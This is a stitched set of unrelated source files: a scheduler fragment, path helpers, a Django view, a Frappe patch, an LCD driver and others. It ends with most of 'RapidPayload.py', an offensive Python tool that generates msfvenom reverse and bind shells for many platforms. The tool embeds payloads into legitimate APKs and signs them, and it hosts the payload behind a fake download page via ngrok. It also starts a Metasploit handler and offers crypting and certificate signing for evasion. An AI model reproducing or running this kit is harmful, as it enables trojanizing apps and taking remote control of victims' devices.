minute=parsed_ajad['data']['allHelins'][x]['minute'], end_date='2018-06-06')
scheduler.start()
scheduler.print_jobs()
print('Press Ctrl+{0} to exit'.format('Break' if os.name == 'nt' else 'C'))
try:
# This is here to simulate application activity (which keeps the main thread alive).
while True:
time.sleep(2)
except (KeyboardInterrupt, SystemExit):
# Not strictly necessary if daemonic mode is enabled but should be done if possible
scheduler.shutdown()
| 28.57971 | 116 | 0.66785 |
b86e4e2bd618a3ee7bd66ddf4f430e4103f4ba09
| 510 |
py
|
Python
|
kollektiv5gui/util/paths.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 3 |
2019-03-21T17:02:55.000Z
|
2019-04-04T18:16:10.000Z
|
kollektiv5gui/util/paths.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 11 |
2019-10-30T12:05:39.000Z
|
2022-03-11T23:43:54.000Z
|
kollektiv5gui/util/paths.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 1 |
2019-10-30T12:04:00.000Z
|
2019-10-30T12:04:00.000Z
|
import os
# store the path to the module's root directory
# this assumes that this file resides exactly
# one folder above the module's root
__ROOT_DIR = os.path.dirname(os.path.abspath(os.path.join(__file__, '..')))
__RESOURCE_DIR = os.path.join(__ROOT_DIR, 'resources')
def getModuleRoot():
"""
Returns the path to the module's root directory
"""
return __ROOT_DIR
def getResourcePath():
"""
Returns the path to the project's resource directory
"""
return __RESOURCE_DIR
| 23.181818 | 75 | 0.705882 |
b8b418e1b412569c9b5bf891f39e8243e7c86b15
| 271 |
py
|
Python
|
django101/django101/tasks/views.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | 1 |
2022-03-03T10:16:14.000Z
|
2022-03-03T10:16:14.000Z
|
django101/django101/tasks/views.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
django101/django101/tasks/views.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
# from django101.tasks.models import Task
def home(request):
context = {
'title': 'Tasks manager',
# 'tasks': Task.objects.all(),
}
return render(request, 'home.html', context)
| 19.357143 | 48 | 0.645756 |
a772ae90c5d1a2528065a160ef235937b0ce5cf1
| 307 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/update_customer_pos_id.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/update_customer_pos_id.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v8_0/update_customer_pos_id.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
frappe.reload_doctype("Customer")
frappe.db.sql(""" update `tabCustomer` set customer_pos_id = name """)
| 34.111111 | 71 | 0.76873 |
ac6433a8285dcd750789d59601cce3a0a7dda695
| 805 |
py
|
Python
|
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_remove_ocorrencias.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_remove_ocorrencias.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_remove_ocorrencias.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
# --------------------------
# UFSC - CTC - INE - INE5603
# Exercício Processa Números
# --------------------------
# Classe responsável por remover as ocorrências de um número.
from view.paineis.painel_abstrato import PainelAbstrato
from model.processa_numeros import remove_ocorrencias
class PainelRemoveOcorrencias(PainelAbstrato):
def __init__(self):
super().__init__('Remove Ocorrências')
def interaja(self):
numeros = self._leiaints()
continuar = True
while continuar:
numero = self._leia1int('Digite o número a ser removido : ')
sem_numero = remove_ocorrencias(numeros, numero)
print('A lista {} sem o número {} fica {}.'.format(numeros, numero, sem_numero))
continuar = 's' == input('Outro número? [s/n]')
| 36.590909 | 92 | 0.628571 |
3bc07407b3824c8226f94b050e3dae0f5cb4261f
| 549 |
py
|
Python
|
Nucleo/smain_Quimica.py
|
Jonatan966/SODA
|
046d8c1e7b9bac3a555526c9fe2f365c2b338aca
|
[
"MIT"
] | null | null | null |
Nucleo/smain_Quimica.py
|
Jonatan966/SODA
|
046d8c1e7b9bac3a555526c9fe2f365c2b338aca
|
[
"MIT"
] | null | null | null |
Nucleo/smain_Quimica.py
|
Jonatan966/SODA
|
046d8c1e7b9bac3a555526c9fe2f365c2b338aca
|
[
"MIT"
] | null | null | null |
qui_version = 'MODULO QUIMICA v0.0.1'
import sys
sys.path.append('Nucleo/')
sys.path.append('Modulos/Quimica/')
from Nucleo.smain_Handler import *
def soda_QUIMICA():
sMain_Saidas().Welcome("QUIMICA")
while True:
q = sMain_Saidas().Prompt("QUIMICA")
handler = sMain_Handlers().quiHandler(q)
if handler != None:
handler()
elif q == 'SAIR' or q == 'QUIT' or q == 'VOLTAR':
break
elif q == '':
pass
else:
sMain_Avisos().nFound(q, qui_version)
| 22.875 | 57 | 0.570128 |
5a09e05193b9a9c7c815e96f476bbc547e1cbaea
| 2,815 |
py
|
Python
|
.circleci/checklhe/color.py
|
tmartini/JHUGen
|
80da31668d7b7eb5b02bb4cac435562c45075d24
|
[
"Apache-2.0"
] | 3 |
2015-06-08T13:09:28.000Z
|
2020-09-04T19:59:36.000Z
|
.circleci/checklhe/color.py
|
tmartini/JHUGen
|
80da31668d7b7eb5b02bb4cac435562c45075d24
|
[
"Apache-2.0"
] | 64 |
2015-06-24T15:08:17.000Z
|
2022-01-25T04:59:32.000Z
|
.circleci/checklhe/color.py
|
tmartini/JHUGen
|
80da31668d7b7eb5b02bb4cac435562c45075d24
|
[
"Apache-2.0"
] | 19 |
2015-05-04T22:15:41.000Z
|
2021-07-06T10:04:40.000Z
|
import usefulstuff
class Color(object):
def __init__(self, id):
self.id = id
self.particles = usefulstuff.printableset()
self.antiparticles = usefulstuff.printableset()
def addparticle(self, p):
if p.color() == self.id:
self.particles.add(p)
if p.anticolor() == self.id:
self.antiparticles.add(p)
def check(self):
return linemakessense(self.particles, self.antiparticles)
def __str__(self):
return str(self.id)
def linemakessense(particles, antiparticles, start = None, end = None):
particles = particles.copy()
antiparticles = antiparticles.copy()
if not particles.isdisjoint(antiparticles):
return False
if len(particles) == len(antiparticles) == 0:
return True
if start is not None and end is not None and start is end and len(particles) + len(antiparticles) == 1 and (start in particles or start in antiparticles):
return True
for p in particles:
if p.startvertex is None:
if start is not None and start is not p:
return False
start = p
if p.endvertex is None:
if end is not None and end is not p:
return False
end = p
for p in antiparticles:
if p.endvertex is None:
if start is not None and start is not p:
return False
start = p
if p.startvertex is None:
if end is not None and end is not p:
return False
end = p
if start is None and end is not None or start is not None and end is None:
return False
if start is None and end is None:
try:
start = list(particles)[0]
end = list(particles)[0]
except IndexError: #no particles, only antiparticles
start = list(antiparticles)[0]
end = list(antiparticles)[0]
if start in particles:
nextvertex = start.endvertex
if start is not end:
particles.remove(start)
elif start in antiparticles:
nextvertex = start.startvertex
if start is not end:
antiparticles.remove(start)
else:
assert(0)
if len(particles) == len(antiparticles) == 0:
return True
possiblenextparticles = usefulstuff.printableset()
for p in particles:
if p.startvertex is nextvertex:
possiblenextparticles.add(p)
for p in antiparticles:
if p.endvertex is nextvertex:
possiblenextparticles.add(p)
return any(linemakessense(particles, antiparticles, nextparticle, end) for nextparticle in possiblenextparticles)
class Colors(dict):
def __missing__(self, id):
self[id] = Color(id)
return self[id]
| 30.934066 | 158 | 0.602487 |
0cb255c3c3215188d9d76662a4e264c2918557a2
| 7,937 |
py
|
Python
|
MAIN/STM32F405_C/NORMAL/history/V24/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405_C/NORMAL/history/V24/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405_C/NORMAL/history/V24/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
from pyb import UART
import utime
import register
class LCDCommand:
class Page:
Buffer = str()
Backup = str()
Repeat = False
Headline = "P."
Entry = "1" #Page 0_1
Main = "2" #Page_1
Bye = "3" #Page_Bye
Alarm = "4" #Page_Alarm
def ClearBuffer(self):
self.Backup = str()
class Ignition:
Buffer = str()
Backup = str()
Repeat = False
Headline = "I."
On = "1" #Ignition_On
Off = "2" #Ignition_Off
def ClearBuffer(self):
self.Backup = str()
class Seat:
NumberOfSeats = register.MAX_SEAT_NUMBER
Buffer = [str()] * NumberOfSeats
Backup = [str()] * NumberOfSeats
Repeat = False
Headline = "S."
Saved = "1" #Seat_Ok
Unregistered = "2" #Seat_Unregistered
Registered = "3" #Seat_Registered
Full = "4" #Seat_Red
FullWithSeatBeltAttached = "5" #Seat_Green
BlankWithSeatBeltAttached = "6" #Seat_Yellow
PadError = "7" #Seat_Fault
HubError = "8" #Seat_Fault
PadShortCircuit = "9" #Seat_Fault
def ClearBuffer(self):
self.Backup = [str()] * self.NumberOfSeats
class Counters:
Buffer = str()
Backup = str()
Repeat = False
Headline = "C."
Default = 1 #C0-25
def ClearBuffer(self):
self.Backup = str()
class Record:
Buffer = str()
Backup = str()
Repeat = False
Headline = "R."
Default = "1" #Mode_Null
RecordMode = "2" #Mode_Record
Services = "3" #Mode_Service
def ClearBuffer(self):
self.Backup = str()
class Services:
Buffer = str()
Backup = str()
Repeat = False
Headline = "rec.pic="
On = "11"
def ClearBuffer(self):
self.Backup = str()
class Door:
Buffer = str()
Backup = str()
Repeat = False
Headline = "door.pic="
Open = "52"
Close = "51"
def ClearBuffer(self):
self.Backup = str()
class SocialDistance:
Buffer = str()
Backup = str()
Repeat = False
Headline = "SDC.pic"
On = "23"
Off = "24"
def ClearBuffer(self):
self.Backup = str()
# SD.pic=26 yasaklı uyarı
class Instructions:
Buffer = str()
Backup = str()
Repeat = False
Headline = "L."
Sleep = "0"
WakeUp = "1"
def ClearBuffer(self):
self.Backup = str()
class ProgressBar:
Buffer = str()
Backup = str()
Repeat = False
Headline = "sens.val="
def ClearBuffer(self):
self.Backup = str()
class Diagnostic:
Buffer = str()
Backup = str()
Repeat = False
Headline = "diag.txt="
def ClearBuffer(self):
self.Backup = str()
def ClearAllBuffer(self):
LCDCommand.Page.ClearBuffer(LCDCommand.Page)
LCDCommand.Ignition.ClearBuffer(LCDCommand.Ignition)
LCDCommand.Seat.ClearBuffer(LCDCommand.Seat)
LCDCommand.Counters.ClearBuffer(LCDCommand.Counters)
LCDCommand.Record.ClearBuffer(LCDCommand.Record)
LCDCommand.Services.ClearBuffer(LCDCommand.Services)
LCDCommand.Door.ClearBuffer(LCDCommand.Door)
LCDCommand.SocialDistance.ClearBuffer(LCDCommand.SocialDistance)
LCDCommand.ProgressBar.ClearBuffer(LCDCommand.ProgressBar)
LCDCommand.Diagnostic.ClearBuffer(LCDCommand.Diagnostic)
class Display():
def __init__(self):
super().__init__()
self.Setup()
def Setup(self):
#self.UART = UART(2, 115200)
self.UART = UART(3, 921600) #2000000
def Process(self):
self.Instructions()
self.Page()
self.Ignition()
self.Seat()
self.Counters()
self.Record()
#self.ProgressBar()
#self.Services()
#self.Door()
# self.SocialDistance()
#self.Diagnostic()
def Page(self):
if (LCDCommand.Page.Buffer != LCDCommand.Page.Backup) or LCDCommand.Page.Repeat:
self.SendCommand(LCDCommand.Page.Headline + LCDCommand.Page.Buffer)
LCDCommand.Page.Backup = LCDCommand.Page.Buffer
def Ignition(self):
if (LCDCommand.Ignition.Buffer != LCDCommand.Ignition.Backup) or LCDCommand.Ignition.Repeat:
self.SendCommand(LCDCommand.Ignition.Headline + LCDCommand.Ignition.Buffer)
LCDCommand.Ignition.Backup = LCDCommand.Ignition.Buffer
def Seat(self):
for i in range(LCDCommand.Seat.NumberOfSeats):
if (LCDCommand.Seat.Buffer[i] != LCDCommand.Seat.Backup[i]) or LCDCommand.Seat.Repeat:
self.SendCommand(LCDCommand.Seat.Headline + str(i) + "." + LCDCommand.Seat.Buffer[i])
LCDCommand.Seat.Backup[i] = LCDCommand.Seat.Buffer[i]
def Counters(self):
if (LCDCommand.Counters.Buffer != LCDCommand.Counters.Backup) or LCDCommand.Counters.Repeat:
self.SendCommand(LCDCommand.Counters.Headline + LCDCommand.Counters.Buffer)
LCDCommand.Counters.Backup = LCDCommand.Counters.Buffer
def Record(self):
if (LCDCommand.Record.Buffer != LCDCommand.Record.Backup) or LCDCommand.Record.Repeat:
self.SendCommand(LCDCommand.Record.Headline + LCDCommand.Record.Buffer)
LCDCommand.Record.Backup = LCDCommand.Record.Buffer
def Services(self):
if (LCDCommand.Services.Buffer != LCDCommand.Services.Backup) or LCDCommand.Services.Repeat:
self.SendCommand(LCDCommand.Services.Headline + LCDCommand.Services.Buffer)
LCDCommand.Services.Backup = LCDCommand.Services.Buffer
def Door(self):
if (LCDCommand.Door.Buffer != LCDCommand.Door.Backup) or LCDCommand.Door.Repeat:
self.SendCommand(LCDCommand.Door.Headline + LCDCommand.Door.Buffer)
LCDCommand.Door.Backup = LCDCommand.Door.Buffer
def SocialDistance(self):
if (LCDCommand.SocialDistance.Buffer != LCDCommand.SocialDistance.Backup) or LCDCommand.SocialDistance.Repeat:
self.SendCommand(LCDCommand.SocialDistance.Headline + LCDCommand.SocialDistance.Buffer)
LCDCommand.SocialDistance.Backup = LCDCommand.SocialDistance.Buffer
def Instructions(self):
if (LCDCommand.Instructions.Buffer != LCDCommand.Instructions.Backup) or LCDCommand.Instructions.Repeat:
self.SendCommand(LCDCommand.Instructions.Headline + LCDCommand.Instructions.Buffer)
LCDCommand.Instructions.Backup = LCDCommand.Instructions.Buffer
def ProgressBar(self):
if (LCDCommand.ProgressBar.Buffer != LCDCommand.ProgressBar.Backup) or LCDCommand.ProgressBar.Repeat:
self.SendCommand(LCDCommand.ProgressBar.Headline + LCDCommand.ProgressBar.Buffer)
LCDCommand.ProgressBar.Backup = LCDCommand.ProgressBar.Buffer
def Diagnostic(self):
if (LCDCommand.Diagnostic.Buffer != LCDCommand.Diagnostic.Backup) or LCDCommand.Diagnostic.Repeat:
self.SendCommand(LCDCommand.Diagnostic.Headline + LCDCommand.Diagnostic.Buffer)
LCDCommand.Diagnostic.Backup = LCDCommand.Diagnostic.Buffer
def SendCommand(self, buf=""):
try:
self.UART.write(buf)
self.NextionEndCommand()
except OSError as err:
print("OS error: {0}".format(err))
except ValueError:
print("Could not send data over UART.")
except:
print("Unexpected error!")
raise
def NextionEndCommand(self):
self.UART.write(b'\xff')
| 33.209205 | 118 | 0.598715 |
e7e588d823e5ed86184e33ea8b50774027c4ec69
| 21,596 |
py
|
Python
|
Rapid-Payload-main/RapidPayload.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
Rapid-Payload-main/RapidPayload.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
Rapid-Payload-main/RapidPayload.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
#https://github.com/Maruf321/Rapid-Payload
import os
import platform,subprocess,re
from time import sleep
cyan= '\033[36m'
bold= '\033[1m'
end= '\033[0m'
def banner():
print(''' {1}{0}{1}
____ _ ______ __ __
/ __ \____ _____ (_)___/ / __ \____ ___ __/ /___ ____ _____/ /
/ /_/ / __ `/ __ \/ / __ / /_/ / __ `/ / / / / __ \/ __ `/ __ /
/ _, _/ /_/ / /_/ / / /_/ / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ /
/_/ |_|\__,_/ .___/_/\__,_/_/ \__,_/\__, /_/\____/\__,_/\__,_/
/_/ /____/ {2}Maruf follow me on github{0}
'''.format(end,bold,cyan))
def main(platform, type):
lhost = input("\n{0}{1}RapidPayload:~/LHOST# {2}".format(cyan, bold, end))
lport = input("\n{0}{1}RapidPayload:~/LPORT# {2}".format(cyan, bold, end))
nameFile = input("\n{0}{1}RapidPayload:~/FileName# {2}".format(cyan, bold, end))
if platform == 'Windows' and type == '1':
payload= 'windows/meterpreter/reverse_http'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '2':
payload= 'windows/meterpreter/reverse_https'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '3':
payload= 'windows/meterpreter/reverse_tcp'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '4':
payload= 'windows/meterpreter/bind_tcp'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '5':
payload= 'windows/shell/bind_tcp'
format= 'exe'
ext= '.exe'
if platform == 'Windows' and type == '6':
payload= 'windows/shell/reverse_tcp'
format= 'exe'
ext= '.exe'
if platform == 'Linux' and type == '1':
payload= 'linux/x86/meterpreter_reverse_http'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '2':
payload= 'linux/x86/meterpreter_reverse_https'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '3':
payload= 'linux/x86/meterpreter/reverse_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '4':
payload= 'linux/x64/meterpreter_reverse_http'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '5':
payload= 'linux/x64/meterpreter_reverse_https'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '6':
payload= 'linux/x64/meterpreter/reverse_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '7':
payload= 'linux/x86/shell/reverse_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '8':
payload= 'linux/x64/shell/bind_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '9':
payload= 'linux/x86/meterpreter/bind_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '10':
payload= 'linux/x64/meterpreter/bind_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '11':
payload= 'linux/x86/shell/bind_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Linux' and type == '12':
payload= 'linux/x64/shell/reverse_tcp'
format= 'elf'
ext= '.elf'
if platform == 'Python' and type == '1':
payload= 'python/meterpreter/reverse_http'
format= 'raw'
ext= '.py'
if platform == 'Python' and type == '2':
payload= 'python/meterpreter/reverse_https'
format= 'raw'
ext= '.py'
if platform == 'Python' and type == '3':
payload= 'python/meterpreter/reverse_tcp'
format= 'raw'
ext= '.py'
if platform == 'Python' and type == '4':
payload= 'python/meterpreter/bind_tcp'
format= 'raw'
ext= '.py'
if platform == 'Macosx' and type == '1':
payload= 'osx/x86/shell_reverse_tcp'
format= 'macho'
ext= '.macho'
if platform == 'Macosx' and type == '2':
payload= 'osx/x86/shell_bind_tcp'
format= 'macho'
ext= '.macho'
if platform == 'Macosx' and type == '3':
payload= 'osx/x64/meterpreter/bind_tcp'
format= 'macho'
ext= '.bin'
if platform == 'Macosx' and type == '4':
payload= 'osx/x64/meterpreter/reverse_tcp'
format= 'macho'
ext= '.bin'
if platform == 'Macosx' and type == '5':
payload= 'osx/x64/meterpreter_reverse_http'
format= 'macho'
ext= '.bin'
if platform == 'Macosx' and type == '6':
payload= 'osx/x64/meterpreter_reverse_https'
format= 'macho'
ext= '.bin'
if platform == 'Java' and type == '1':
payload= 'java/meterpreter/reverse_http'
format= 'jar'
ext= '.jar'
if platform == 'Java' and type == '2':
payload= 'java/meterpreter/reverse_https'
format= 'jar'
ext= '.jar'
if platform == 'Java' and type == '3':
payload= 'java/meterpreter/reverse_tcp'
format= 'jar'
ext= '.jar'
if platform == 'Java' and type == '4':
payload= 'java/meterpreter/bind_tcp'
format= 'jar'
ext= '.jar'
if platform == 'Apple_ios' and type == '1':
payload= 'apple_ios/aarch64/meterpreter_reverse_http'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '2':
payload= 'apple_ios/aarch64/meterpreter_reverse_https'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '3':
payload= 'apple_ios/aarch64/meterpreter_reverse_tcp'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '4':
payload= 'apple_ios/aarch64/shell_reverse_tcp'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '5':
payload= 'apple_ios/armle/meterpreter_reverse_http'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '6':
payload= 'apple_ios/armle/meterpreter_reverse_https'
format= 'macho'
ext= '.macho'
if platform == 'Apple_ios' and type == '7':
payload= 'apple_ios/armle/meterpreter_reverse_tcp'
format= 'macho'
ext= '.macho'
print("\033[1m\033[36m")
os.system('sudo msfvenom -p '+payload+' LHOST='+lhost+' LPORT='+lport+' -f'+format+' -o '+nameFile+ext)
os.system('sudo chmod +x '+nameFile+ext)
sleep(3)
def legit(platform, type):
lhost = input("\n{0}{1}RapidPayload:~/LHOST# {2}".format(cyan, bold, end))
lport = input("\n{0}{1}RapidPayload:~/LPORT# {2}".format(cyan, bold, end))
direct = input("\n{0}{1}RapidPayload:~/Path_of_your_APK# {2}".format(cyan, bold, end))
newname = input("\n{0}{1}RapidPayload:~/NewFileName# {2}".format(cyan, bold, end))
if platform == 'Android' and type == '1':
payload= 'android/meterpreter/reverse_http'
ext= '.apk'
if platform == 'Android' and type == '2':
payload= 'android/meterpreter/reverse_https'
ext= '.apk'
if platform == 'Android' and type == '3':
payload= 'android/meterpreter/reverse_tcp'
ext= '.apk'
print("\033[1m\033[36m")
os.system('sudo msfvenom -p '+payload+' -x '+direct+' LHOST='+lhost+' LPORT='+lport+' -o '+newname+ext)
sleep(3)
def Normal(platform, type):
lhost = input("\n{0}{1}RapidPayload:~/LHOST# {2}".format(cyan, bold, end))
lport = input("\n{0}{1}RapidPayload:~/LPORT# {2}".format(cyan, bold, end))
newname = input("\n{0}{1}RapidPayload:~/FileName# {2}".format(cyan, bold, end))
if platform == 'Android' and type == '1':
payload= 'android/meterpreter/reverse_http'
ext= '.apk'
if platform == 'Android' and type == '2':
payload= 'android/meterpreter/reverse_https'
ext= '.apk'
if platform == 'Android' and type == '3':
payload= 'android/meterpreter/reverse_tcp'
ext= '.apk'
print("\033[1m\033[36m")
os.system('sudo msfvenom -p '+payload+' LHOST='+lhost+' LPORT='+lport+' -o '+newname+ext)
print("\n\033[1m\033[36m#|signing APK|#\n\033[1m\033[36m")
os.system("keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000")
os.system('jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore '+newname+ext+' alias_name')
os.system("rm -rf my-release-key.keystore")
sleep(3)
def Ngrok():
print("\033[1m\033[36m")
os.system("ls")
print("")
name1=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
def index_defaultNgrok():
with open("index.html", "w") as file:
file.write("""
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- AngelSecurityTeam -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
.btn {
background-color: DodgerBlue;
border: none;
color: white;
padding: 12px 30px;
cursor: pointer;
font-size: 20px;
}
.btn:hover {
background-color: RoyalBlue;
}
</style>
<title></title>
<script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
</head>
<body>
<div class="wrapper">
<center>
<!-- AngelSecurityTeam -->
<input type="submit" class="btn" style="width:40%" class="fa fa-download" class="BotonDown" value="Download" onclick="document.location.href='"""+name1+"""' ">
</center>
</a>
</div>
</body>
</html>
""")
index_defaultNgrok()
#http.server 80
os.system("python3 -m http.server 80 > .server 2> /dev/null &")
os.system("chmod +x ngrok")
#http.server 80 NGROK
portN=80
os.system("./ngrok http {} > /dev/null &".format(portN))
sleep(8)
os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url')
urlFile = open('link2.url', 'r')
url = urlFile.read()
urlFile.close()
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
print("\n\033[1m\033[36mRapidPayload:~/LinkNgrok# \033[1m\033[0m"+url)
print(" ")
def localhost():
print("\033[1m\033[36m")
os.system("ls")
print("")
name2=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
def index_defaultlocalhost():
with open("index.html", "w") as file:
file.write("""
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- AngelSecurityTeam -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
.btn {
background-color: DodgerBlue;
border: none;
color: white;
padding: 12px 30px;
cursor: pointer;
font-size: 20px;
}
.btn:hover {
background-color: RoyalBlue;
}
</style>
<title></title>
<script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
</head>
<body>
<div class="wrapper">
<center>
<!-- AngelSecurityTeam -->
<input type="submit" class="btn" style="width:40%" class="fa fa-download" class="BotonDown" value="Download" onclick="document.location.href='"""+name2+"""' ">
</center>
</a>
</div>
</body>
</html>
""")
index_defaultlocalhost()
#http.server 80
os.system("python3 -m http.server 80 > .server 2> /dev/null &")
print("\n\033[1m\033[36mRapidPayload:~/Link_LocalHost# \033[1m\033[0m"+"http://localhost:80")
print(" ")
def MSF():
host1=input("\n{0}{1}RapidPayload:~/LHOST# {2}".format(cyan, bold, end))
port1=input("\n{0}{1}RapidPayload:~/LPORT# {2}".format(cyan, bold, end))
payload1=input("\n{0}{1}RapidPayload:~/PAYLOAD# {2}".format(cyan, bold, end))
datamsf = "use exploit/multi/handler;set PAYLOAD "+payload1+";set LHOST "+host1+";set LPORT "+port1+";run"
subprocess.call(["msfconsole", "-q" ,"-x", datamsf])
def RapidP():
select = input('\n{2}{0}{2}[{1}{2}1{0}]{2}{1} {2} Windows\n{0}{2}[{1}{2}2{2}{0}]{1} {2} Linux\n{0}{2}[{1}{2}3{2}{0}]{1} {2} Android\n{0}{2}[{1}{2}{2}4{0}]{1} {2} Python\n{0}{2}[{1}{2}{2}5{0}]{1} {2} MacOS\n{0}{2}[{1}{2}{2}6{0}]{1} {2} Java\n{0}{2}[{1}{2}{2}7{0}]{1} {2} Apple_ios\n{0}{2}[{1}{2}{2}8{0}]{1} {2} Connect_Ngrok\n{0}{2}[{1}{2}{2}9{0}]{1} {2} Connect_LocalHost\n{0}{2}[{1}{2}{2}10{0}]{1} {2}Connect_MSF\n{0}{0}[{1}{2}0{0}]{1} {2} Exit\n\n{0}{2}RapidPayload:~#{1} '.format(cyan, end, bold))
if select == '1':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}windows/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}windows/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}windows/meterpreter/reverse_tcp\n{0}[{1}{2}4{0}]{1} {2}windows/meterpreter/bind_tcp\n{0}[{1}{2}5{0}]{1} {2}windows/shell/bind_tcp\n{0}[{1}{2}6{0}]{1} {2}windows/shell/reverse_tcp\n{0}[{1}{2}7{0}]{1} {2}Crypter_Shellter\n{0}[{1}{2}8{0}]{1} {2}Signs_EXE\n{0}[{1}{2}9{0}]{1} {2}Crypter_Hyperion\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/Windows#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
elif type == '7':
print("\n{0}{1}RapidPayload:~/{2}".format(cyan, bold, end))
dirtt=os.getcwd()
print("\033[1m\033[36m")
os.system("wine "+dirtt+"shellter.exe")
print("\n{0}{1}RapidPayload:~/{2}".format(cyan, bold, end))
elif type == '8':
print("\033[1m\033[36m")
os.system("ls")
wi1=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
wi2=input("\n{0}{1}RapidPayload:~/NewFileName# {2}".format(cyan, bold, end))
dirtt=os.getcwd()
print("\033[1m\033[36m")
os.system("python3 "+dirtt+"signs.py www.microsoft.com 443 "+wi1+" "+wi2+".exe")
os.system("rm -rf certs")
print("\033[1m\033[36m")
os.system("ls")
